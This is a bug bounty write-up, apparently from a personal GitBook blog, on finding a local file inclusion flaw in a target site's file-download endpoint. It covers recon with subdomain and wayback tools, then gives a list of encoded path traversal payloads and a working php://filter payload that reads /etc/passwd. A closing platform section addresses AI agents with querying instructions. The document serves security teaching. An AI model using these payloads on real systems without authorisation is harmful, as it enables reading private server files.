> For the complete documentation index, see [llms.txt](https://strik3r.gitbook.io/strik3r-blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://strik3r.gitbook.io/strik3r-blog/bug-bounty/easy-lfi.md).
# Easy LFI
Hello Hackers !!
I\`m going to share one of my last & fast finding
let’s call it **target.com**, they runs a bug bounty program with wildcard scope **\*.target.com**
#### Tools:
* [Subdomainer](https://github.com/Cyber-Guy1/Subdomainer)
* [waybackurls](https://github.com/tomnomnom/waybackurls)
* [gf](https://github.com/tomnomnom/gf)
### **Subdomains Enumeration**
In this step it\`s a gold tip to use multiple tools to gather good results, I like to use [**Subdomainer**](https://github.com/Cyber-Guy1/Subdomainer)
Subdomainer is an automation tool for domains & subdomains gatherin wheather for single target or multiple targets. Subdomainer uses multiple tools for doing the subdomains & domians gathering job in a perfect way, it can take a domains / targets list and doing the whole operation on them and after finshing the job it save the result in a comprehandable & ordered way.
A simple usage for Subdomainer
**`./subdomainer -t target.com –f true`**
A lot of thing comes after subdomains gathering, one of them is collect all urls from live hosts and filter any intersting parameters or endpoints
### Collect Them All
So in this step I use [**waybackurl**s](https://github.com/tomnomnom/waybackurls)
Usage Of Waybackurl: This is really a good tool for bugbounty hunter to fetch all url from wayback machine .
**`cat all_live.txt | waybackurls`**
### Wrapper
Now we have all wayback urls now You can grep to collect you interesting parameter or end point usage:
**`grep -iE “redirect=”`**
**But that would take a lot of time and effort. To automate this process we can use** [**gf**](https://github.com/tomnomnom/gf) **tool**
A wrapper around grep to avoid typing common patterns.
**`cat waybackdata | gf lfi | tee -a lfi.txt`**
after that we can go and check these endpoint manually
Luckily, I noticed a very promising endpoint `/download.php?file` and my spidey sense got activated
After visiting this host i found that this endpoint was for downloading pdf files
when trying to inject `1` to this parameter It downloads a file contain this error
so clearly this function job is to seacrh for a requested file via this parametr in this path and try to get
without another thought i injected some payloads like this:
```
..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}
```
But no luck .. i got the same error message
in spite of that something was telling me to keep digging into this 🧐
By using [wappalyzer ](https://www.wappalyzer.com/)I found that this host is running on php, so I used php file wrappers payload
`php://filter/convert.base64-encode/resource=/etc/passwd`
**php\://filter** allows a pen tester to include local files and base64 encodes the output. Therefore, any base64 output will need to be decoded to reveal the contents
So let\`s decode this base64 string
**`echo "BASE64_STRING" | base64 -d`**
And we got our **/passwd** file decoded
### EXTRA
Although these tools and techniques are few, there is a lot that can be done with it . you can use multiple [Gf-Patterns](https://github.com/1ndianl33t/Gf-Patterns) to get :
* xss
* ssrf
* idor
* ssti
* open redirect
* etc
A great Place to find more LFI bypassing tricks:
{% embed url="" %}
> Thanks For Reading
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://strik3r.gitbook.io/strik3r-blog/bug-bounty/easy-lfi.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.